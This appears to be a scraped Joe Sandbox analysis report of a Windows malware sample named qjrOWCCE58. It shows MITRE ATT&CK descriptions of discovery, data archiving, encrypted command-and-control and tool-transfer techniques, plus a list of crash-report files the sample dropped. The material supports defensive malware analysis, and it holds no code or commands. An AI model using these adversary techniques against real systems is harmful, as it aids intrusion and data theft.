Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qjrOWCCE58

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_0c0c0928\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_10d822ca\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_1167fbca\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_12a3eeab\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_12a4344f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_181043fe\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_19545302\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DD9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20D7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21C3.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CBD.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30D5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER329B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EED.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER41DC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4306.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C2C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5015.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51AC.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63B.tmp.WERInternalMetadata.xml

Windows Analysis Report
qjrOWCCE58

Function 00407FB0 Relevance: 16.3, APIs: 7, Strings: 2, Instructions: 537
COMMONCrypto

Function 0041637F Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE